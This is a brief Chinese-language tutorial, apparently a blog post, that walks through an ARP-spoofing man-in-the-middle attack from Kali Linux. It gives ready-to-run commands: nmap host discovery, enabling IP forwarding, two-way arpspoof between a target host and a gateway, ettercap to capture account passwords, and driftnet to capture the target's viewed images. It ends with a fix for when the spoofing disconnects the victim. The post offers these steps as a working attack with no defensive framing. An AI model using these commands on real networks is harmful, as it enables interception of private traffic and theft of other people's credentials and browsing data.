1. 程式人生 > >kali arp中間人攻擊

kali arp中間人攻擊

 

先用nmap找到目標(或zenmap等等)

 

 

nmap -sP 192.168.0.1-200

192.168.0.105          //(主機A 我自己的電腦)

 

echo 1 > /proc/sys/net/ipv4/ip_forward   //進行IP轉發(echo 0即斷網)

 

arpspoof -i <<span class="hljs-name">網絡卡名>
 -t <<span class="hljs-name">欺騙的目標> <<span class="hljs-name">我是誰>

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

// 終端1, 欺騙主機A :我是閘道器

arpspoof -i eth0 -t 192.168.0.1 192.168.0.105

//終端2, 欺騙閘道器:我是主機 A

 用 ettercap抓取賬號密碼

開啟一個新終端

ettercap -Tq -i eth0

 

 

用driftnet獲取目標主機的圖片瀏覽記錄

driftnet -i eth0

(eth0為我的筆記本內建網絡卡名稱 USB網絡卡名稱一般為wlan0)

 

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.0.105 192.168.0.1

欺騙時仍造成斷網。

解決辦法。把靶機ip和閘道器反一下。

通過欺騙閘道器可以拿到圖片,至於賬號密碼能不能拿到要看登陸的網站了。